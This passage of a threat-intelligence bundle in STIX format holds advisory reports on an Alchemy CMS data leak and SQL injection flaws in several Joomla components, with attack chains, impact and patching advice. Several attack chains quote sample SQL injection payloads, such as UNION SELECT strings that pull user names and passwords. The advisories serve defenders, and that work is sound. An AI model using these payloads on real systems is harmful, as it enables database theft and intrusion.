\"http://target.com/api/pages/nested?elements=true\"`).\n5.  **Exfiltration of Confidential Data**: The vulnerable Alchemy CMS application responds to this request by providing the full content (elements/ingredients) of the previously identified restricted and unpublished pages, including sensitive text like \"TOPSECRET_RESTRICTED_BODY_proof123\", effectively bypassing all access control mechanisms.\n6.  **Impact and Analysis**: The attacker successfully obtains confidential information, intellectual property, or other sensitive data, which can then be used for competitive advantage, further system compromise, or to cause significant reputational and financial damage.\n\n## Impact\n\nThe vulnerability allows for complete and unauthenticated information disclosure of any content stored within Alchemy CMS that has been marked as restricted or unpublished. This could include sensitive business documents, intellectual property, draft communications, private user data, or internal plans. If exploited, organizations face severe consequences such as data breaches, regulatory non-compliance, reputational damage, and financial losses due to the exposure of proprietary or confidential information. The severity is highlighted by the observed ability to leak specific \"TOPSECRET_RESTRICTED_BODY_proof123\" content.\n\n## Recommendation\n\n*   **Patch CVE-XXXX-YYYY**: Immediately upgrade your Alchemy CMS installation to a fixed version beyond 8.2.5 (e.g., 8.2.6 or later for the 8.x series) or 7.4.14 (for the 7.x series) to remediate the vulnerability described in the GHSA-mqq5-j7w8-2hgh advisory.\n*   **Enable Webserver Logging**: Ensure comprehensive logging is enabled for your web server (e.g., Apache, Nginx) to capture full HTTP request details, including `cs-method`, `cs-uri-stem`, and `cs-uri-query`.\n*   **Deploy Sigma Rules**: Deploy the provided Sigma rules `Detects Alchemy CMS /api/pages/nested metadata leak attempt` and `Detects Alchemy CMS /api/pages/nested sensitive content leak attempt` to your SIEM solution and tune them for your environment.\n*   **Review Logs**: Proactively review historical web server logs for any past exploitation attempts matching the patterns identified in the Sigma rules.\n",
      "published": "2026-06-19T17:53:42Z",
      "labels": [
        "web-vulnerability",
        "information-disclosure",
        "cms",
        "rails",
        "ruby"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-mqq5-j7w8-2hgh"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3b0b110f-818f-5f1f-9ccb-c6f26a3eb83c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--94e28adc-b6d0-542d-9039-65d17780d87f",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8ded1bf0-6f13-5f61-9a47-bf3a7af9ae95",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--94e28adc-b6d0-542d-9039-65d17780d87f",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5a174cae-13d1-59dc-b34b-a85cbdc687f0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--94e28adc-b6d0-542d-9039-65d17780d87f",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--94e28adc-b6d0-542d-9039-65d17780d87f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla J-CruisePortal SQL Injection (CVE-2019-25749)",
      "description": "## Overview\n\nJoomla J-CruisePortal versions prior to 6.0.8 are vulnerable to an authenticated SQL injection, identified as CVE-2019-25749. This vulnerability allows an authenticated attacker to execute arbitrary SQL queries by injecting malicious code through the `guest_adult` parameter. Attackers can leverage this by sending crafted POST requests to the `/cruises` endpoint, embedding SQL payloads within the `guest_adult` parameter. This can lead to the extraction of sensitive database information, such as user credentials, customer data, or internal system configurations. Furthermore, it enables the manipulation of existing database records, potentially causing data integrity issues or facilitating further malicious actions within the compromised system. The vulnerability poses a significant risk to data confidentiality and integrity for organizations using the affected software.\n\n## Attack Chain\n\n1.  Attacker obtains valid credentials for Joomla J-CruisePortal (e.g., via phishing, credential stuffing, or prior breach).\n2.  Attacker logs into the J-CruisePortal application, gaining authenticated access.\n3.  Attacker crafts a malicious SQL payload designed for data extraction, manipulation, or database error triggering.\n4.  Attacker sends an HTTP POST request to the `/cruises` endpoint of the J-CruisePortal application.\n5.  The malicious SQL payload is embedded within the `guest_adult` parameter of the POST request, for example, `guest_adult=1' UNION SELECT @@version -- -`.\n6.  The vulnerable application processes the request, incorrectly incorporating the `guest_adult` parameter's value directly into an underlying SQL query without proper sanitization.\n7.  The backend database executes the arbitrary SQL query provided by the attacker, treating it as legitimate.\n8.  The attacker either extracts sensitive data from the database (e.g., user hashes, system configuration) or manipulates database records (e.g., altering booking details, deleting entries).\n\n## Impact\n\nSuccessful exploitation of CVE-2019-25749 allows an authenticated attacker to gain full control over the application's database content. This can lead to a severe data breach, compromising sensitive customer information, administrative credentials, and operational data stored within the Joomla J-CruisePortal database. Attackers can also manipulate or destroy critical database records, leading to data integrity loss, disruption of services, and potential financial and reputational damage. The impact could extend to regulatory non-compliance if personal data is exfiltrated.\n\n## Recommendation\n\n*   Apply the latest security patches or upgrade Cmsjunkie Joomla J-CruisePortal to a version not affected by CVE-2019-25749 (version 6.0.8 or later) immediately.\n*   Implement a Web Application Firewall (WAF) to detect and block malicious POST requests containing SQL injection payloads targeting the `/cruises` endpoint and `guest_adult` parameter.\n*   Enable comprehensive web server access logging to capture full HTTP request details, including `cs-method`, `cs-uri-stem`, `cs-uri-query`, and `sc-status` to facilitate detection of exploitation attempts.\n*   Deploy the Sigma rules in this brief to your SIEM and tune them for your environment to detect attempts to exploit CVE-2019-25749.\n",
      "published": "2026-06-19T18:24:40Z",
      "labels": [
        "sql-injection",
        "web-application",
        "joomla",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25749"
        },
        {
          "source_name": "reference",
          "url": "http://cmsjunkie.com/"
        },
        {
          "source_name": "reference",
          "url": "https://www.cmsjunkie.com/joomla-cruise-reservation-portal"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/46233"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-j-cruiseportal-sql-injection-via-cruises"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--044c9046-bf7c-52d6-8beb-74638842fd67",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3619afc6-e598-5739-b1b0-02ebe0319fd5",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--72b4ff65-c33e-5d39-9e3a-560ebb660ac1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3619afc6-e598-5739-b1b0-02ebe0319fd5",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3619afc6-e598-5739-b1b0-02ebe0319fd5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2019-25750: Joomla J-MultipleHotelReservation SQL Injection",
      "description": "## Overview\n\nCVE-2019-25750 details a critical SQL injection vulnerability affecting Joomla Component J-MultipleHotelReservation version 6.0.7. This flaw enables unauthenticated attackers to execute arbitrary SQL queries against the web application's underlying database. The vulnerability stems from insufficient input sanitization of the `hotel_id` parameter when processing HTTP POST requests to the `search-hotels` endpoint. Threat actors can exploit this by injecting malicious SQL clauses, such as `UNION SELECT` statements, to extract sensitive database content. This direct access allows for exfiltration of table structures, column names, user credentials, and other confidential data, posing a significant risk of data breaches and further system compromise for organizations using the affected component.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a Joomla instance running the vulnerable J-MultipleHotelReservation component version 6.0.7.\n2. The attacker crafts a malicious HTTP POST request targeting the vulnerable endpoint, typically `/index.php?option=com_jmultiplehotelreservation\u0026task=search-hotels`.\n3. The request includes a manipulated `hotel_id` parameter, usually within the URL query string, containing a crafted SQL injection payload (e.g., `' UNION SELECT @@VERSION,user,password FROM users --`).\n4. The Joomla component processes the `hotel_id` parameter without proper input validation or sanitization, directly embedding the attacker's malicious SQL code into the backend database query.\n5. The backend database executes the combined, attacker-controlled SQL query, often retrieving information beyond the intended scope.\n6. The application's response includes the results of the attacker's injected `UNION SELECT` statement, which can contain sensitive database information like table names, column data, or user credentials.\n7. The attacker parses the HTTP response to extract the exfiltrated database content for intelligence gathering or further unauthorized access.\n8. The stolen database information (e.g., administrator hashes) can then be used by the attacker for privilege escalation or lateral movement within the compromised environment.\n\n## Impact\n\nSuccessful exploitation of CVE-2019-25750 grants unauthenticated attackers extensive read access to the web application's entire database. This can lead to the exfiltration of highly sensitive information, including user credentials, personally identifiable information (PII) of guests, booking histories, and potentially financial data. The high CVSS base score of 8.2 (v3.1) and 8.8 (v4.0) underscores the severe nature of this vulnerability, indicating potential for major data breaches, significant reputational damage, and non-compliance with data protection regulations for affected organizations. The impact is specifically confined to systems utilizing the J-MultipleHotelReservation component in version 6.0.7.\n\n## Recommendation\n\n*   Immediately update Joomla Component J-MultipleHotelReservation to a patched version to mitigate CVE-2019-25750. Refer to the vendor's official release notes for upgrade instructions.\n*   Deploy the Sigma rule \"Detects CVE-2019-25750 Exploitation — Joomla J-MultipleHotelReservation SQL Injection\" to your SIEM system to identify attempted and successful exploitation.\n*   Ensure comprehensive web server logging is enabled for all public-facing Joomla instances, specifically capturing HTTP method, URI stem, and URI query (`webserver` log source) for forensic analysis.\n*   Implement and tune Web Application Firewall (WAF) rules to detect and block common SQL injection patterns targeting parameters like `hotel_id`.\n",
      "published": "2026-06-19T18:26:14Z",
      "labels": [
        "sql-injection",
        "web-application",
        "joomla",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25750"
        },
        {
          "source_name": "reference",
          "url": "http://cmsjunkie.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jmultiplehotelreservation/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/46232"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-j-multiplehotelreservation-sql-injection"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ade94ee4-ea50-540c-b7c6-11e4a9c37691",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c53646b3-39e6-5e84-9e5d-9477690b4c3d",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--15d8ea25-7780-52b2-9eb5-e8806c5d8f05",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c53646b3-39e6-5e84-9e5d-9477690b4c3d",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c53646b3-39e6-5e84-9e5d-9477690b4c3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla J-ClassifiedsManager SQL Injection (CVE-2019-25751)",
      "description": "## Overview\n\nA critical SQL injection vulnerability, tracked as CVE-2019-25751, affects Joomla Component J-ClassifiedsManager version 3.0.5. This flaw allows unauthenticated attackers to execute arbitrary SQL queries against the backend database. Exploitation involves injecting malicious SQL payloads into specific POST parameters such as `categorySearch`, `adType`, and `citySearch` when interacting with the `displayads` component. Successful exploitation can lead to the extraction of sensitive database information, including usernames, database schemas, and version details, posing a significant risk of data exfiltration and further compromise of the web application and its underlying data. This vulnerability was published in 2026, highlighting a long-standing risk for unpatched systems.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Vulnerability Identification**: An unauthenticated attacker identifies a Joomla instance running the vulnerable J-ClassifiedsManager component version 3.0.5 via passive or active scanning.\n2.  **Initial Access Attempt**: The attacker constructs an HTTP POST request targeting the `displayads` component of the J-ClassifiedsManager, typically via a URL like `/index.php?option=com_jclassifiedsmanager\u0026view=displayads`.\n3.  **SQL Payload Injection**: The POST request includes crafted SQL injection payloads inserted into vulnerable parameters such as `categorySearch`, `adType`, or `citySearch` within the request body.\n4.  **Vulnerability Exploitation**: The Joomla component processes the malicious input without proper sanitization, leading to the execution of the attacker's arbitrary SQL queries on the backend database.\n5.  **Information Extraction**: The application's response (either directly in the HTTP response body or via verbose error messages) returns the results of the injected SQL queries.\n6.  **Data Exfiltration**: The attacker parses the application's response to systematically collect sensitive information, which can include database usernames, database structures, and system version details.\n\n## Impact\n\nSuccessful exploitation of CVE-2019-25751 can lead to severe consequences for organizations using the vulnerable Joomla component. Attackers can gain unauthorized access to the entire database, potentially exfiltrating sensitive customer data, proprietary business information, or user credentials. This can result in significant financial losses, reputational damage, regulatory penalties, and further compromise of connected systems. The high CVSS score of 8.2 (High) indicates the critical nature of this unauthenticated vulnerability, allowing complete confidentiality compromise and partial integrity compromise without requiring user interaction or privileges.\n\n## Recommendation\n\n*   Immediately update Joomla Component J-ClassifiedsManager to a version greater than 3.0.5, or disable/uninstall the component if an update is not available to mitigate CVE-2019-25751.\n*   Deploy the provided Sigma rules to your SIEM/detection platform to identify attempts to exploit CVE-2019-25751 via web server logs.\n*   Ensure web server logging captures full HTTP request details, including `cs-uri-stem`, `cs-uri-query`, and potentially request bodies (if your WAF or proxy allows for it), to enable comprehensive detection of SQL injection attempts.\n",
      "published": "2026-06-19T18:27:32Z",
      "labels": [
        "sql-injection",
        "web-application",
        "joomla",
        "vulnerability",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25751"
        },
        {
          "source_name": "reference",
          "url": "http://cmsjunkie.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/ads-a-affiliates/classified-ads/j-classifiedsmanager/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/46231"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-j-classifiedsmanager-sql-injection"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--28b63958-86d8-509d-b470-586a339b5ee5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ce078f35-0755-5b66-bf5a-907b4d9778bb",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--55190cce-3978-5d43-b6a3-64cdd80a5d56",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obtain Capabilities",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1588",
          "url": "https://attack.mitre.org/techniques/T1588"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d0ec2f8c-5cd2-5ffc-9bf2-66f5415ba9b3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ce078f35-0755-5b66-bf5a-907b4d9778bb",
      "target_ref": "attack-pattern--55190cce-3978-5d43-b6a3-64cdd80a5d56"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ce078f35-0755-5b66-bf5a-907b4d9778bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2019-25752: Joomla! J-BusinessDirectory SQL Injection",
      "description": "## Overview\n\nCVE-2019-25752 details an SQL injection vulnerability impacting the Joomla! Component J-BusinessDirectory, specifically version 4.9.7. This flaw enables unauthenticated attackers to execute arbitrary SQL queries against the backend database. By crafting malicious HTTP GET requests to the `index.php` endpoint with the `option=com_jbusinessdirectory\u0026task=categories.getCategories` parameters, attackers can inject UNION-based SQL statements into the `type` parameter. This allows for the extraction of sensitive database information, such as schema names, table structures, and potentially critical data from the application's database. The vulnerability does not require any form of authentication, making it a critical threat to affected Joomla! installations.\n\n## Attack Chain\n\n1.  Attacker identifies an internet-facing Joomla! instance running the vulnerable J-BusinessDirectory component version 4.9.7.\n2.  Attacker sends an unauthenticated HTTP GET request targeting the `index.php` file with the specific parameters `option=com_jbusinessdirectory\u0026task=categories.getCategories`.\n3.  Within this GET request, the attacker injects malicious UNION-based SQL statements into the `type` parameter, leveraging the vulnerability (e.g., `type=1 UNION SELECT 1,2,database(),4--`).\n4.  The vulnerable J-BusinessDirectory component processes the `type` parameter without adequate input sanitization or validation.\n5.  The malicious SQL query is executed by the underlying database system, leading to the retrieval of data not intended for public access.\n6.  The database's response, which may include query results or verbose error messages containing extracted information (such as database names or table data), is returned to the attacker through the web server.\n7.  Attacker refines subsequent SQL injection queries to progressively exfiltrate more sensitive database information (e.g., table names, column names, user credentials, application configuration).\n8.  Final objective: Unauthenticated exfiltration of sensitive database contents.\n\n## Impact\n\nSuccessful exploitation of CVE-2019-25752 allows unauthenticated attackers to gain complete access to the Joomla! J-BusinessDirectory component's database. This includes the potential to extract all stored information, such as user details, business listings, configuration settings, and any other data managed by the component. The high CVSS score of 8.2 (High) reflects the severe confidentiality impact (C:H) and low integrity impact (I:L) due to the ability to modify data, though the primary observed impact is data exfiltration. Organizations leveraging this component could face significant data breaches, reputational damage, and compliance violations.\n\n## Recommendation\n\n*   Immediately update Joomla! Component J-BusinessDirectory to a patched version beyond 4.9.7, as recommended by the vendor.\n*   Deploy the Sigma rule \"Detects CVE-2019-25752 Exploitation - Joomla! J-BusinessDirectory SQL Injection\" to your SIEM to identify exploitation attempts.\n*   Enable comprehensive web server access logging and review logs for suspicious GET requests to `/index.php` containing SQL injection patterns in the query string, specifically within the `type` parameter as detailed in the overview.\n",
      "published": "2026-06-19T18:28:57Z",
      "labels": [
        "sql-injection",
        "web-application",
        "joomla",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--55190cce-3978-5d43-b6a3-64cdd80a5d56"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25752"
        },
        {
          "source_name": "reference",
          "url": "http://cmsjunkie.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/j-businessdirectory/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/46230"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-j-businessdirectory-sql-injection"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cbe5b584-186f-5c25-b4e3-b31788e5aa51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--12e39cb9-b102-54d7-80a1-10c51f11c455",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Information Repositories",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1537",
          "url": "https://attack.mitre.org/techniques/T1537"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--733c4f65-7d7e-565f-826a-91f3091a6045",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--12e39cb9-b102-54d7-80a1-10c51f11c455",
      "target_ref": "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--12e39cb9-b102-54d7-80a1-10c51f11c455",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2019-25753 — Joomla! Component VMap SQL Injection",
      "description": "## Overview\n\nJoomla! Component VMap version 1.9.6 is vulnerable to an unauthenticated SQL injection, identified as CVE-2019-25753. This critical vulnerability allows attackers to execute arbitrary SQL queries by manipulating the `latlngbound` parameter in specific GET requests. The attack targets `index.php` with `option=com_vmap\u0026task=loadmarker` parameters, enabling the injection of malicious SQL code. This flaw can lead to manipulation of the underlying database, facilitating sensitive information disclosure or further compromise of the web application. The vulnerability was published on 2026-06-19 and affects specific versions of the VMap component, making it crucial for organizations running affected Joomla instances to patch immediately to prevent data exfiltration and unauthorized access.\n\n## Attack Chain\n\n1.  **Reconnaissance**: An unauthenticated attacker identifies a Joomla! instance running the VMap component.\n2.  **Vulnerability Identification**: The attacker determines the specific version of VMap (1.9.6) is susceptible to CVE-2019-25753.\n3.  **Malicious Request Crafting**: The attacker crafts a GET request to `index.php` including `option=com_vmap\u0026task=loadmarker` and an SQL injection payload within the `latlngbound` parameter.\n4.  **SQL Injection Execution**: The vulnerable VMap component processes the crafted GET request, incorporating the malicious payload directly into its database query logic without proper sanitization.\n5.  **Database Interaction**: The injected SQL code executes, allowing the attacker to manipulate the database query, bypass authentication, or retrieve sensitive data.\n6.  **Data Exfiltration/Impact**: Depending on the payload, the attacker can extract sensitive information (e.g., user credentials, system configuration, private records) or further compromise the database.\n\n## Impact\n\nSuccessful exploitation of CVE-2019-25753 can lead to severe consequences for affected organizations. Attackers can gain unauthorized access to the Joomla! site's database, allowing them to extract sensitive user information, manipulate website content, or potentially gain administrative control. This can result in data breaches, reputational damage, and further system compromise. While specific victim counts are not provided, any organization utilizing Joomla! with the vulnerable VMap component (version 1.9.6) is at risk of significant data loss and operational disruption.\n\n## Recommendation\n\n*   Prioritize patching for CVE-2019-25753 immediately by updating the Joomla! VMap component to a version beyond 1.9.6 or disabling the component if an update is not feasible.\n*   Deploy the Sigma rules provided in this brief to your SIEM to detect and alert on suspicious web requests targeting the VMap component.\n*   Enable comprehensive web server logging for HTTP requests, including full URI paths and query strings, to activate the detection rules effectively.\n*   Review web server access logs for any historical instances of the patterns identified by the Sigma rules, particularly around the `latlngbound` parameter and `option=com_vmap\u0026task=loadmarker` to identify potential past exploitation attempts.\n",
      "published": "2026-06-19T18:30:02Z",
      "labels": [
        "sql-injection",
        "web-exploitation",
        "joomla",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--003dd11e-6b72-5943-8a73-a2bc6954b663"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25753"
        },
        {
          "source_name": "reference",
          "url": "http://wdmtech.com/"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/vmap/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/46229"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-vmap-sql-injection-via-loadmarker"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--babc94fa-3560-5e01-9c61-bfc3fa95bb49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6d60d29c-2f7c-5e79-b6a1-b7b7eb13850e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--719495f5-f4ab-55fa-87e7-a693b53e9a86",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6d60d29c-2f7c-5e79-b6a1-b7b7eb13850e",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
